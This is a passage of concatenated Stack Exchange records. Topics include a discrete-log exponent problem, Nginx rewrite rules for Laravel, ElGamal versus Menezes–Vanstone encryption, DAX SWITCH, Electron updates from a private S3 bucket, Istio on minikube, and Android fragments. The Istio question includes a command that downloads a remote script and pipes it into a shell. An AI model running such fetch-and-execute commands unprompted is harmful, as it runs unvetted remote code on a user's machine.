Also note that if the size constraint on $a$, $b$, $k$ and $k'$ is removed, the problem is not well-defined (there may be multiple solutions even in the constrained case; I'm not sure).\nMultiple solutions if size constraints are ignored\nGenerically we can consider this isomorphic to a linear algebra problem in the exponents. We write $c_1=a+km_1$, $C_i=g^c_i\\mod p$ and so forth. By multiplying terms $C_iC_j$ or exponentiating terms $C_i^d$ we can add $c_i+c_j$ or multiply our unknown exponents by constants $dc_i$, so that we can find $g^x$ where $x$ is an arbitrary linear combinations of these $c_i$ (a Diffie-Hellman oracle would allow us to form $g^y$ where $y$ is an arbitrary polynomial expressions in the $c_i$). Restricting ourselves to such linear combinations (as would be the case for a black box group), the problem becomes to find a linear combination of our $c_i$ that is equal to $a$ or $b$.\nWe have the system\n$$\\left(\\matrix{1&0&m_1&0\\\\ 0&1&0&-m_2\\\\ 1&0&m_3&0\\\\ 0&1&0&-m_4}\\right)\\left(\\matrix{a\\\\ b\\\\ k\\\\ k'}\\right)=\\left(\\matrix{c_1\\\\ c_2\\\\c_3\\\\c_4}\\right)\\pmod{\\phi(p)}$$\nif we write $M$ for the 4x4 matrix and $\\mathbf c$ for the right hand vector, we might hope to find our linear combination from $M^{-1}\\mathbf c$. However we see that\n$$\\mathrm{det}(M)=m_1m_4-m_2m_3\\equiv 0\\pmod{\\phi(p)}$$\nso that our matrix is not invertible.\nHigh school linear algebra now tells us that we either have no solutions or many solutions. The fact that our construction defines one solution tells us that there are many solutions. A little row reduction tells us that $m_2c_1+m_1c_2-m_3c_3-m_1c_4\\equiv 0\\pmod{\\phi(p)}$. In particular then if e.g. $m_1$ is coprime to $\\phi(p)$, we can determine $C_4$ given $C_1$, $C_2$ and $C_3$ and so the 4th equation grants us no additional information. In the absence of further degeneracy, it follows that we can, for example, choose an arbitrary $g^a$ and then find $g^k\\equiv(C_1\/g^a)^{1\/m_1}\\pmod p$, $g^b\\equiv C_2(g^k)^{m_2}\\pmod p$ and $g^{k'}\\equiv(C_3\/g^a)^{1\/m_3}$ that produce the $C_1$, $C_2$, $C_3$ and $C_4$ that we are presented with. However, the $a$, $b$, $k$ and $k'$ associated with these will not necessarily meet the size constraints.\nA no-go in the black box model\nNow suppose that we can extended such a solver to a black box multiplicative group. Suppose that we are given a discrete logarithm problem for the generator $g$ of order $q$ and the element $C_1$ is such a group. We choose an arbitrary $m_1$ and by a counting argument there is a strong probability that $c_1$ can be written in the form $c_1\\equiv a+km_1\\pmod q$ with $a,k\\le q^{1\/2}$. Write $d=[q^{1\/2}]$. We now call our solver with $C_1=C_1$, $C_2=g^d\/C_1$, $C_3=C_1g^{m_1}$ and $C_4=g^d\/C_3$ and $m_1=m_2=m_3=m_4$ (corresponding to the values $b=d-a$ and $k'=k+1$ which satisfy the size constraints). Our solver will return $g^a$ from which we can recover $a$ using the baby-steps\/giant-steps method in $O(\\root 4\\of q)$ steps. Similarly we can recover $g^k=(C_1\/g^a)^{1\/m_1}$ and $k$ in another $O(\\root 4\\of q)$ steps. This allows us to compute $c_1$ with $O(\\root 4\\of q)$ group operations which is not possible for a black box group.\nComment: Yes, $\\sqrt q$ is possible to compute $c_1$, but $\\root 4\\of q$ is not. Recall that $c_1$ is arbitrary and we have a contradiction.\nComment: What is $C_1$ and what is $c_1$? Are they same?\nComment: @Turbo as in the first part $C_1=g^c_1\\mod p$. 
The argument does not preclude some use of the structure of $\\mathbb Z\/p\\mathbb Z$, but does mean that to recover $g^a$ we must do something other than raise the $C_i$ to powers and multiply.\nComment: You could use the general number field sieve to recover $c_1$ (not polynomial time, but certainly subexponential) and then use lattice basis reduction to find $a, k\\approx\\sqrt p$ such that $a+km_1\\equiv c_1\\pmod p$.\nComment: $m_1m_4-m_2m_3=0$ here and not $\\lambda(p)$.\nComment: Is $\\neq\\lambda(p)$ an issue to the lower bound you are proving?\nComment: The condition $m_1m_4-m_2m_3\\equiv 0\\pmod{\\phi(p0}$ includes the case $m_1m_4-m_2m_3=\\phi(p)=\\lambda(p)$ and so all of the above still stands in the specific case.\nComment: Yes agree. But in your situation $m_1=\\dots=m_4$ provides $m_1m_4-m_2m_3=0$ exactly while I require $\\lambda(p)$ exactly. $m_1m_4-m_2m_3=0\\implies m_1m_4-m_2m_3\\equiv0\\bmod\\lambda(p)$ but not $m_1m_4-m_2m_3=\\lambda(p)$.\nComment: the black box lower bound works only if you work with group elements mod p. But a,k are not group elements mod p.\nComment: I think the bb lower bound is invalid. You are getting the final exponent through intermediate objects which are a,k and these are not group elements mod p. Refer https:\/\/crypto.stackexchange.com\/questions\/99282\/does-generic-group-black-box-model-prohibit-msb-of-discrete-logarithm?noredirect=1&lq=1 where instead of a,k we employ man which is not group element mod p. Can you double check and compare with msb answer to tell what is different?\nComment: I don't think anything is different: a putative algorithm to solve MSB of the discrete logarithm of a BB group is not possible as it would beat the $q^{1\/2}$ bound, likewise a putative algorithm to solve your problem in a BB group is not possible as it too would beat the $q^{1\/2}$ bound.\nComment: The point made there is MSB is not BB box group element. Likewise in here a,k are not BB box group elements. Are you certain of your bound?\nComment: MSB, $a$ and $k$ are all defined as components of the index of a cyclic group element and so all exist in the black box context.\nComment: then what is the point made there? I don't get it. It says going through msb is in play because msb is not a group element.\nComment: The point here is that just as the MSB oracle does not exist for a BB group, an oracle for your problem does not exist for a BB group.\nComment: Is the BB lower bound only for deterministic algorithms or does it apply to randomized algorithms as well?\n","meta":{"source":"crypto.stackexchange","title":"Common exponent problem related to discrete logarithms assuming Diffie Hellman oracle","dup_signals":{}},"subset":"stackexchange"} +{"text":"Laravel with Nginx parameters are empty\n\nQuestion: I just set up Nginx, and I'm trying to use it to host a Laravel app, but I ran into 2 problems.\n\nFor GET method, I always get an extra parameter in my inputs.\n\nUsing PostMan (Chrome) to do my testings, I set the destination URL and my desired parameters and send the request. The output that I get, it always includes the <code>REQUEST_URI<\/code> which it shouldn't. 
Example output:\n\n.\n<code>Array (\n [\/api\/user] => \/\/ This shouldn't be here\n [test] => test\n)\n<\/code>\n\nMy parameters (the above) will NOT show for DELETE or PUT, at all, and for POST I'll only get the <code>REQUEST_URI<\/code>\n\nNginx vhost (Followed Setting up Laravel w\/ Nginx)\n<code>server {\n server_name local.test.com;\n root \/var\/www\/test\/public;\n\n location \/ {\n index index.php index.html index.htm;\n }\n\n # serve static files directly\n location ~* \\.(jpg|jpeg|gif|css|png|js|ico|html)$ {\n access_log off;\n expires max;\n }\n\n # removes trailing slashes (prevents SEO duplicate content issues)\n if (!-d $request_filename) {\n rewrite ^\/(.+)\/$ \/$1 permanent;\n }\n\n # unless the request is for a valid file (image, js, css, etc.), send to bootstrap\n if (!-e $request_filename) {\n rewrite ^\/(.*)$ \/index.php?\/$1 last;\n break;\n }\n\n # catch all\n error_page 404 \/index.php;\n\n # The PHP Inclusion Block\n # include \/etc\/nginx\/includes\/php;\n location ~ \\..*\/.*\\.php$ {\n # I'm pretty sure this stops people trying to traverse your site to get to other PHP files\n return 403;\n }\n\n #location ~ \\.php$ {\n location ~ \\.php(.*)$ {\n try_files $uri =404;\n fastcgi_split_path_info ^(.+\\.php)(\/.+)$;\n fastcgi_pass 127.0.0.1:9000;\n fastcgi_index index.php;\n include \/etc\/nginx\/fastcgi_params;\n }\n\n# Deny Any Access to .htaccess Files That May Be Present (not usually in issue in Laravel)\n# include \/etc\/nginx\/includes\/deny_htaccess;\nlocation ~ \/\\.ht\n{\n deny all;\n}\n\n error_log \/var\/www\/logs\/test-error.log;\n}\n<\/code>\nfastcgi_params :\n<code>fastcgi_param QUERY_STRING $query_string;\nfastcgi_param REQUEST_METHOD $request_method;\nfastcgi_param CONTENT_TYPE $content_type;\nfastcgi_param CONTENT_LENGTH $content_length;\n\nfastcgi_param SCRIPT_FILENAME $request_filename;\nfastcgi_param SCRIPT_NAME $fastcgi_script_name;\nfastcgi_param REQUEST_URI $request_uri;\nfastcgi_param DOCUMENT_URI $document_uri;\nfastcgi_param DOCUMENT_ROOT $document_root;\nfastcgi_param SERVER_PROTOCOL $server_protocol;\n\nfastcgi_param GATEWAY_INTERFACE CGI\/1.1;\nfastcgi_param SERVER_SOFTWARE nginx\/$nginx_version;\n\nfastcgi_param REMOTE_ADDR $remote_addr;\nfastcgi_param REMOTE_PORT $remote_port;\nfastcgi_param SERVER_ADDR $server_addr;\nfastcgi_param SERVER_PORT $server_port;\nfastcgi_param SERVER_NAME $server_name;\n\n#fastcgi_param HTTPS $https;\n\n# PHP only, required if PHP was built with --enable-force-cgi-redirect\nfastcgi_param REDIRECT_STATUS 200;\n\nfastcgi_connect_timeout 60;\nfastcgi_send_timeout 180;\nfastcgi_read_timeout 180;\nfastcgi_buffer_size 128k;\nfastcgi_buffers 4 256k;\nfastcgi_busy_buffers_size 256k;\nfastcgi_temp_file_write_size 256k;\nfastcgi_intercept_errors on;\n<\/code>\nnginx.conf Has only 1 thing changed, and that is <code>keepalive_timeout<\/code> from 65 to 15\nSo I absolutely have no clue, where all this thing goes wrong. But I do have to mention, that on another 2 environments that I have (One with Lighttpd and the other with Apache2) the app works perfectly.\nFrom what I've noticed, its all reduced to the following code:\n<code># unless the request is for a valid file (image, js, css, etc.), send to bootstrap\nif (!-e $request_filename) {\n rewrite ^\/(.*)$ \/index.php?\/$1 last;\n break;\n}\n<\/code>\nWhich will make the GET work... 
and add the additional parameter\nAnswer: It is best to avoid unneccessary rewrites in your nginx configuration (See Nginx Pitfalls), one in particular is the one responsible for passing the request to the Laravel front controller:\nAll you need for Laravel is:\n<code>location \/ {\n index index.php index.html index.htm;\n try_files $uri $uri\/ index.php?$query_string;\n}\n<\/code>\nFirst that tries to access a file directly, then a directory, and if neither exists it passes the request to index.php. <code>$query_string<\/code> is important to pass along as that will contain the <code>$_GET<\/code> data that otherwise gets lost.\nAnd here is my own FastCGI configuration piece:\n<code>location ~ \\.php$ {\n fastcgi_pass 127.0.0.1:9000;\n fastcgi_index index.php;\n fastcgi_param SCRIPT_FILENAME $document_root\/$fastcgi_script_name;\n include fastcgi_params;\n}\n<\/code>\nAs for unexpected input, it could be the way your current rewrite works, but to say for sure, what are you outputting?\nComment: `dd(Input::all());` it's what I'm outputting... and no, it's not `Input::all()` that set the undesired parameter\nComment: Alright. Try the suggested configuration and tell me if it does it.\nComment: Just tried it, by commenting the `if`s containing a rewrite rule, and now I get no output of my parameters at all\nComment: Thanks for the help, but your conf is no of a help to me.\nComment: Have you replaced the part that you describe as \"its all reduced to the following code\" with my suggested code? I'm just not sure if that was clear\nComment: Your suggested code regards anything ending in `.php` and accesing document root. even though, I do have tried your sugested code,and as mentioned, doesn't work\nAnswer: This works for me:\n<code>location \/ {\n index index.php;\n try_files $uri $uri\/ \/index.php?q=$uri&$args;\n}\n\nlocation ~ \\.php$ {\n\n include fastcgi_params;\n fastcgi_pass 127.0.0.1:9000;\n fastcgi_index index.php;\n\n fastcgi_split_path_info ^(.+\\.php)(\/.+)$;\n fastcgi_param PATH_INFO $fastcgi_path_info;\n fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;\n fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;\n\n}\n<\/code>\nComment: I don't think Laravel expects a `q` parameter, have not seen it before. But saw it in CI\nComment: Yes, I've tested it without `q` and it works fine. So `try_files $uri $uri\/ \/index.php?$args;` works.\nAnswer: From your config:\n<code>rewrite ^\/(.*)$ \/index.php?\/$1 last;\n<\/code>\nhere you have a redirect to <code>\/index.php?\/$1<\/code> (e.g. <code>\/index.php?\/some\/path<\/code>).\n<code>fastcgi_split_path_info ^(.+\\.php)(\/.+)$;\n<\/code>\nand here you spilt path by <code>^(.+\\.php)(\/.+)$<\/code> regex (e.g. <code>\/index.php\/some\/path<\/code>).\nHave you noticed the difference?\nComment: I actually removed the `fastcgi_spli` part and now I get the parameters, but I still have the `[\/api\/user] => \/\/ This shouldn't be here` problem\nComment: I followed http:\/\/stackoverflow.com\/questions\/8856664\/setting-up-laravel-w-nginx and just addapted a little bit\nComment: But you have configured nginx that way. Your `rewrite ^\/(.*)$ \/index.php?\/$1 last;` is responsible for adding the path to the parameters.\nComment: please forgive my ignorance, but how else should I do it? That's what all the result I've seen on Google (searching `laravel nginx`) suggests.\nComment: You should do it the way that you want. Nginx has a very flexible configuration language, that allows to configure any desired behaviour. 
I suggest you to read the documentation and write your configuration from scratch. Useful links: http:\/\/nginx.org\/en\/docs\/ and http:\/\/wiki.nginx.org\/Pitfalls\nComment: Sorry, I cannot help because even don't know what `laravel` is, but it is clear to me that the example of configuration you have found is poorly written, probably by the person with a little knowledge of nginx.\nAnswer: I was facing similar issue and I fixed it with following configs:\n<code>server {\n listen 80;\n server_name subdomain.domain.com;\n root \/var\/www\/dir\/public;\n\n charset utf-8;\n\n location = \/favicon.ico { access_log off; log_not_found off; }\n location = \/robots.txt { access_log off; log_not_found off; }\n\n access_log off;\n error_log \/var\/log\/nginx\/registration.app-error.log error;\n error_page 404 \/index.php;\n sendfile off;\n\n # Point index to the Laravel front controller.\n index index.php;\n\n location \/ {\n # try_files $uri $uri\/ index.php?$query_string;\n try_files $uri $uri\/ \/index.php?&$args;\n }\n\n location ~ \\.php$ {\n include snippets\/fastcgi-php.conf;\n #\n # # With php7.0-cgi alone:\n # fastcgi_pass 127.0.0.1:9000;\n # # With php7.0-fpm:\n fastcgi_pass unix:\/run\/php\/php7.2-fpm.sock;\n }\n\n location ~ \/\\.ht {\n #deny all;\n }\n}\n<\/code>\nComment: The only one that worked for me, critical bit was `index.php?&$args;`, running Laravel 4.2 and php7.0 on debian 9.6\nAnswer: This is a configuration that works for me with NGINX and Laravel\n<code>server {\n\n listen 80;\n server_name sub.domain.com;\n set $root_path '\/var\/www\/html\/application_name\/public';\n root $root_path;\n\n index index.php index.html index.htm;\n\n try_files $uri $uri\/ @rewrite;\n\n location @rewrite {\n rewrite ^\/(.*)$ \/index.php?_url=\/$1;\n }\n\n location ~ \\.php {\n\n fastcgi_pass 127.0.0.1:9000;\n fastcgi_index \/index.php;\n\n include \/etc\/nginx\/fastcgi_params;\n\n fastcgi_split_path_info ^(.+\\.php)(\/.+)$;\n fastcgi_param PATH_INFO $fastcgi_path_info;\n fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;\n fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;\n }\n\n location ~* ^\/(css|img|js|flv|swf|download)\/(.+)$ {\n root $root_path;\n }\n\n location ~ \/\\.ht {\n deny all;\n }\n\n}\n<\/code>\nAnswer: Same issue fixed as described in NGINX documentation: Embedded Variables: $is_args\nAdd this in NGINX location:\n<code>location \/ {\n try_files $uri $uri\/ \/index.php$is_args$args;\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Laravel with Nginx parameters are empty","dup_signals":{}},"subset":"stackexchange"} +{"text":"What differences between Menezes\u2013Vanstone ECC and ElGamal ECC?\n\nQuestion: After researching ECC encryption, I found that we can use ElGamal cryptosystem with elliptic curve and can we use Menezes-Vanstone cryptosystem with elliptic curve. What is the essential difference between the two systems? Which one is better with regards to complexity\/performance?\nComment: If you want practical ECC encryption, use ECIES. It's simple and offers strong security.\nAnswer: The essential difference between these two encryption schemes is that for standard ElGamal encryption on elliptic curves the plaintext space is the set of points in your elliptic curve group while in Menezes-Vanstone (which can be considered as a variant of ElGamal) the plaintext space is $F_p^*\\times F_p^*$ where $F_p$ is the field over which your curve is defined. 
So what does this mean?\nThis means that when using ElGamal over elliptic curves you have to map the message to an elliptic curve point before encryption, while when using Menezes-Vanstone you can take your message string, split it up into to halves and interpret these two strings as elements of $F_p$ each.\nAlternatively, you can use other \"encoding free\" variants of ElGamal such as \"hashed ElGamal\" that avoid the task of mapping \nmessages to points on the curve. In standard ElGamal on elliptic curves you would compute \nthe ciphertext as $(C_1,C_2)=(kP,M+kY)$ where $k$ is a random integer, $M$ the message $m$ \nmapped to a point on the curve, $Y$ the public key and $P$ the generator point.\nIn hashed ElGamal, the ciphertext is $(C_1,C_2)=(kP,m\\oplus H(kY))$ where $H:G\\rightarrow \\{0,1\\}^n$ \nis a hash function that maps points on the curve to $n$ bit strings. Consequently, you can encrypt $n$ bit \nmessages, for instance 256 bit if you use SHA-256 for $H$. For the input to $H$ you need to encode the points of the curve in a suitable way.\nRegarding performance, standard ElGamal on elliptic curves costs two scalar multiplications and one point addition, where Menezes-Vanstone costs you two scalar multiplication and two multiplications in $F_p$. So Menezes-Vanstone will be cheaper from a computational point of view.\nRegarding ciphertext expansion, to encrypt a message (mapped to a point on the curve) with ElGamal, the ciphertext will contain 2 elements of the curve group (which in affine coordinates will be four elements of $F_p$ - and you can bring it down to ~ 2 elements of $F_p$ when using point compression). In Menezes-Vanstone to encrypt a message (which fits into two elements of $F_p$) the ciphertext will contain one element of the curve group (2 elements of $F_p$) and another two elements of $F_p$ (so you have four elements of $F_p$ and using point compression you come down to ~ 3 elements of $F_p$).\nWhen using ElGamal on elliptic curves you can prove that it provides indistinguishability under chosen plaintext attacks (IND-CPA security), where Menezes-Vanstone does not provide IND-CPA security (this paper shows that it is not a probabilistic encryption scheme and thus not IND-CPA secure). So you should definitely not use the Menezes-Vanstone scheme.\nAlternatively, a standardized scheme for public key encryption on elliptic curves is ECIES, which provides stronger security guarantees (IND-CCA security) than ElGamal does (there are ElGamal variants such as Cramer-Shoup wich are IND-CCA secure, but not that efficient as ECIES).\n","meta":{"source":"crypto.stackexchange","title":"What differences between Menezes\u2013Vanstone ECC and ElGamal ECC?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Receiving scalar error on Switch function when using related table\n\nQuestion: Very new to DAX. Trying to use Switch for the first time. Getting 'he expression refers to multiple columns. Multiple columns cannot be converted to a scalar value'. I have been unable to figure out the solution. Here is the code:\n<code>IVC - Delivered Cubic Realization:=SWITCH(\n FILTER('Invoice Fact',RELATED('Product Dimension'[Product Family Code]) = \"PL\"),\n DIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Cubic Conversion Footage]) * 1000\n ,DIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Cubic Conversion Footage])\n)\n<\/code>\nComment: can you explain what you are trying to achieve here. 
The use of the RELATED Function in the DAX does not look appropriate.\nComment: If the Product Family Code on table Product Dimension table = \"PL\" the I want to divide the Delivered Amount Extended by the Cubic Conversion Footage from the Invoice Fact table and multiply it by 1000. If it is not \"PL\", then do the division but not multiply it by 1000.\nComment: Should have mentioned that the Invoice Fact table and the Product Dimension table are linked via a key field.\nComment: can you please provide sample data\nAnswer: I figured out how to do what I needed:\nIVC - Delivered Selling Realization:=VAR ProductFamily = SELECTEDVALUE('Product Dimension'[Product Family Code])\nVAR ProductCategory = SELECTEDVALUE('Product Dimension'[Product Category Code])\nRETURN\nSWITCH(\nTRUE(),\nProductFamily = \"PL\",\nDIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Billed Selling Footage]) * 1000,\nProductFamily = \"VE\",\nDIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Billed Selling Footage]) * 1000,\nProductFamily = \"EWP\" && ProductCategory = \"BEAM\",\nDIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Billed Selling Footage]) * 1000,\nProductFamily = \"LU\" && ProductCategory = \"CORE\",\nDIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Billed Selling Footage]) * 10,\nDIVIDE('Invoice Fact'[IVC - Delivered Amount Extended], 'Invoice Fact'[IVC - Billed Selling Footage])\n)\n","meta":{"source":"stackoverflow","title":"Receiving scalar error on Switch function when using related table","dup_signals":{}},"subset":"stackexchange"} +{"text":"Auto Updater does not work for Amazon S3 private Bucket\n\nQuestion: \n\nVersion:\n22.9.1\n\nElectron Version:\nElectron Type (current, beta, nightly):\n11.1.0 (stable)\n\nTarget:\nmac OS 11.1\n\nElectron Updater Version:\n4.3.5\n\nI set my S3 to private () and then put the following in my update script:\n<code>.......\nautoUpdater.on('checking-for-update', () => {\n if (w !== undefined) {\n w.get('settings').content().send('check-for-updates-begin');\n }\n\n let opts = {\n service: 's3',\n region: 'eu-central-1',\n host: s3_bucket + '.s3.eu-central-1.amazonaws.com',\n path: '\/latest-mac.yml' \/\/ For example....\n };\n aws4.sign(opts, {\n accessKeyId: \"XXXXX\",\n secretAccessKey: \"XXXXXXXX\"\n });\n\n autoUpdater.requestHeaders = opts.headers;\n });\n........\n<\/code>\nUnfortunately, I then get the following error:\n<code>Error: HttpError: 403 Forbidden\n\"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\\n<Error><Code>SignatureDoesNotMatch<\/Code><Message>The request signature we calculated does not match the signature you provided. 
Check your key and signing method.<\/Message>\n\n.....\n<\/code>\nSomeone a solution for me?\nAnswer: My solution:\nI set the FeedUrl for autoUpdater <code>autoUpdater.setFeedURL('https:\/\/[BUCKET].s3.[REGION].amazonaws.com');<\/code>\nAnswer: If anyone else has a similar issue and setFeedUrl did not work, try this:\nhttps:\/\/github.com\/electron-userland\/electron-builder\/issues\/2355#issuecomment-724842574\n\nUser @scorring posted an elegant solution with correct props\n<code>autoUpdater.on(\"checking-for-update\", async () => {\n let opts = {\n region: \"eu-west-1\",\n protocol: \"https:\",\n hostname: \"BUCKET_NAME.s3.amazonaws.com\",\n path: \"\/PATH\/TO\/latest.yml\",\n host: \"s3-eu-west-1.amazonaws.com\"\n };\n\n await aws4.sign(opts, {\n accessKeyId: \"XXX\",\n secretAccessKey: \"YYY\"\n });\n\n autoUpdater.requestHeaders = opts.headers;\n});\n<\/code>\nThis worked for me\nComment: https:\/\/meta.stackexchange.com\/a\/8259\/997587\n","meta":{"source":"stackoverflow","title":"Auto Updater does not work for Amazon S3 private Bucket","dup_signals":{}},"subset":"stackexchange"} +{"text":"Unable to setup Istio with minikube\n\nQuestion: I followed Istio's official documentation to setup Istio for sample bookinfo app with minikube. but I'm getting Unable to connect to the server: net\/http: TLS handshake timeout error. these are the steps that I have followed(I have kubectl & minikube installed).\n<code>minikube start\ncurl -L https:\/\/git.io\/getLatestIstio | sh -\ncd istio-1.0.3\nexport PATH=$PWD\/bin:$PATH\nkubectl apply -f install\/kubernetes\/helm\/istio\/templates\/crds.yaml\nkubectl apply -f install\/kubernetes\/istio-demo-auth.yaml\nkubectl get pods -n istio-system\n<\/code>\nThis is the terminal output I'm getting\n<code>$ kubectl get pods -n istio-system\nNAME READY STATUS RESTARTS AGE\ngrafana-9cfc9d4c9-xg7bh 1\/1 Running 0 4m\nistio-citadel-6d7f9c545b-lwq8s 1\/1 Running 0 3m\nistio-cleanup-secrets-69hdj 0\/1 Completed 0 4m\nistio-egressgateway-75dbb8f95d-k6xj2 1\/1 Running 0 4m\nistio-galley-6d74549bb9-mdc97 0\/1 ContainerCreating 0 4m\nistio-grafana-post-install-xz9rk 0\/1 Completed 0 4m\nistio-ingressgateway-6bd4957bc-vhbct 1\/1 Running 0 4m\nistio-pilot-7f8c49bbd8-x6bmm 0\/2 Pending 0 4m\nistio-policy-6c65d8cff4-hx2c7 2\/2 Running 0 4m\nistio-security-post-install-gjfj2 0\/1 Completed 0 4m\nistio-sidecar-injector-74855c54b9-nnqgx 0\/1 ContainerCreating 0 3m\nistio-telemetry-65cdd46d6c-rqzfw 2\/2 Running 0 4m\nistio-tracing-ff94688bb-hgz4h 1\/1 Running 0 3m\nprometheus-f556886b8-chdxw 1\/1 Running 0 4m\nservicegraph-778f94d6f8-9xgw5 1\/1 Running 0 3m\n\n$kubectl describe pod istio-galley-6d74549bb9-mdc97\nError from server (NotFound): pods \"istio-galley-5bf4d6b8f7-8s2z9\" not found\n<\/code>\npod describe output\n<code> $ kubectl -n istio-system describe pod istio-galley-6d74549bb9-mdc97\nName: istio-galley-6d74549bb9-mdc97\nNamespace: istio-system\nNode: minikube\/172.17.0.4\nStart Time: Sat, 03 Nov 2018 04:29:57 +0000\nLabels: istio=galley\n pod-template-hash=1690826493\nAnnotations: scheduler.alpha.kubernetes.io\/critical-pod=\n sidecar.istio.io\/inject=false\nStatus: Pending\nIP:\nControlled By: ReplicaSet\/istio-galley-5bf4d6b8f7\nContainers:\n validator:\n Container ID:\n Image: gcr.io\/istio-release\/galley:1.0.0 Image ID:\n Ports: 443\/TCP, 9093\/TCP Host Ports: 0\/TCP, 0\/TCP\n Command: \/usr\/local\/bin\/galley\n validator --deployment-namespace=istio-system\n --caCertFile=\/etc\/istio\/certs\/root-cert.pem\n 
--tlsCertFile=\/etc\/istio\/certs\/cert-chain.pem\n --tlsKeyFile=\/etc\/istio\/certs\/key.pem\n --healthCheckInterval=2s\n --healthCheckFile=\/health\n --webhook-config-file\n \/etc\/istio\/config\/validatingwebhookconfiguration.yaml\n State: Waiting\n Reason: ContainerCreating\n Ready: False\n Restart Count: 0\n Requests:\n cpu: 10m\n Liveness: exec [\/usr\/local\/bin\/galley probe --probe-path=\/health --interval=4s] delay=4s timeout=1s period=4s #success=1 #failure=3\n Readiness: exec [\/usr\/local\/bin\/galley probe --probe-path=\/health --interval=4s] delay=4s timeout=1s period=4s #success=1 #failure=3\n Environment: <none>\n Mounts:\n \/etc\/istio\/certs from certs (ro)\n \/etc\/istio\/config from config (ro)\n \/var\/run\/secrets\/kubernetes.io\/serviceaccount from istio-galley-service-account-token-9pcmv(ro)\nConditions:\n Type Status\n Initialized True\n Ready False\n PodScheduled True\nVolumes:\n certs:\n Type: Secret (a volume populated by a Secret)\n SecretName: istio.istio-galley-service-account\n Optional: false\n config:\n Type: ConfigMap (a volume populated by a ConfigMap)\n Name: istio-galley-configuration\n Optional: false\n istio-galley-service-account-token-9pcmv:\n Type: Secret (a volume populated by a Secret)\n SecretName: istio-galley-service-account-token-9pcmv\n Optional: false\nQoS Class: Burstable\nNode-Selectors: <none>\nTolerations: node.kubernetes.io\/not-ready:NoExecute for 300s\n node.kubernetes.io\/unreachable:NoExecute for 300s\nEvents:\n Type Reason Age From Message\n ---- ------ ---- ---- -------\n Normal Scheduled 1m default-scheduler Successfully assigned istio-galley-5bf4d6b8f7-8t8qz to minikube\n Normal SuccessfulMountVolume 1m kubelet, minikube MountVolume.SetUp succeeded for volume \"config\"\n Normal SuccessfulMountVolume 1m kubelet, minikube MountVolume.SetUp succeeded for volume \"istio-galley-service-account-token-9pcmv\"\n Warning FailedMount 27s (x7 over 1m) kubelet, minikube MountVolume.SetUp failed for volume \"certs\" : secrets \"istio.istio-galley-service-account\" not found\n<\/code>\nafter some time :-\n<code> $ kubectl describe pod istio-galley-6d74549bb9-mdc97\n\nUnable to connect to the server: net\/http: TLS handshake timeout\n<\/code>\nso I wait for istio-sidecar-injector and istio-galley containers to get created. If I again run kubectl get pods -n istio-system or any other kubectl commands gives Unable to connect to the server: net\/http: TLS handshake timeout error. \nPlease help me with this issue.\nps: I'm running minikube on ubuntu 16.04\nThanks in advance.\nComment: Can you post the output for `kubectl describe pod istio-galley-6d74549bb9-mdc97`\nComment: question updated please take a look.\nComment: Sorry: `kubectl -n istio-system describe pod istio-galley-6d74549bb9-mdc97`\nComment: updated the question please take a look.\nComment: @Mahendra Hegde, Does `minikube logs` command show any suspicious events?\nComment: thanks. Problem resolved. when I run minikube start --memory=4048. maybe it was a memory issue.\nAnswer: Looks like you are running into this and this the secret <code>istio.istio-galley-service-account<\/code> is missing in your <code>istio-system<\/code> namespace. You can try the workaround as described:\n\nInstall as outlined in the docs: https:\/\/istio.io\/docs\/setup\/kubernetes\/minimal-install\/ the missing secret is created by the citadel pod which isn't running due to the --set security.enabled=false flag, setting that to true starts citadel and the secret is created.\nComment: sorry. 
that did not help. somehow gallery and ingress are running now. but I'm facing the same problem with deployed applications.they are not initializing and after some time , I'm getting \"Unable to connect to the server: net\/http: TLS handshake timeout\" error.\nAnswer: Problem resolved. when I run <code>minikube start --memory=4048<\/code>. maybe it was a memory issue.\nComment: Almost certainly was; this is exactly how minikube behaves when it is short of either memory or CPU.\nAnswer: When using either the <code>istio-demo.yaml<\/code> or <code>istio-demo-auth.yaml<\/code>, you'll find that a minimum of 4GB RAM is required to run Istio (particularly when you deploy its sample app, BookInfo, too). This is true whether your running MiniKube or Docker Desktop and is one of the gotchas that Meshery identifies and attempts to help those deploying Istio or other service meshes circumvent.\n","meta":{"source":"stackoverflow","title":"Unable to setup Istio with minikube","dup_signals":{}},"subset":"stackexchange"} +{"text":"Pass data between two fragments in same activity and update WebView\n\nQuestion: Hello I'm trying to pass a String value from a fragment to another one. I have a single Activity.\nThe thing that I'm trying to do is when a listview item is pressed send the value to the another fragment, load the fragment (This I had made with this code): \n<code>Fragment cambiarFragment = new FragmentInterurbanos();\n Bundle args = new Bundle();\nFragmentTransaction transaction = getFragmentManager().beginTransaction();\n\n transaction\n .replace(R.id.container, cambiarFragment)\n .addToBackStack(null)\n .setCustomAnimations(R.anim.slide_in_left, R.anim.slide_out_right);\n\n \/\/ Commit the transaction\n transaction.commit();\n<\/code>\nAnd then retrieve the String and update a WebView placed in the new fragment (This method cannot be launched when the user select in NavigationDrawer this section (Fragment).\nThanks for your help in advance!\nComment: if you are sending String from fragment to fragment then try [Communicating Fragments](http:\/\/developer.android.com\/training\/basics\/fragments\/communicating.html)\nAnswer: There are many ways you can achieve this... you could pass the string to the new Fragment through a Bundle like this:\n<code>Bundle bundle = new Bundle();\nbundle.putString(key, value);\nfragment.setArguments(bundle);\n<\/code>\nor maybe have a DataController class where you store the string and the new fragment retrieves it.\n","meta":{"source":"stackoverflow","title":"Pass data between two fragments in same activity and update WebView","dup_signals":{}},"subset":"stackexchange"} +{"text":"ndsolve solution goes to zero for large domain\n\nQuestion: I am trying to solve numerically the diffusion equation with absorbing boundary conditions on a finite domain. The initial condition is an approximation of a delta function centered in x0 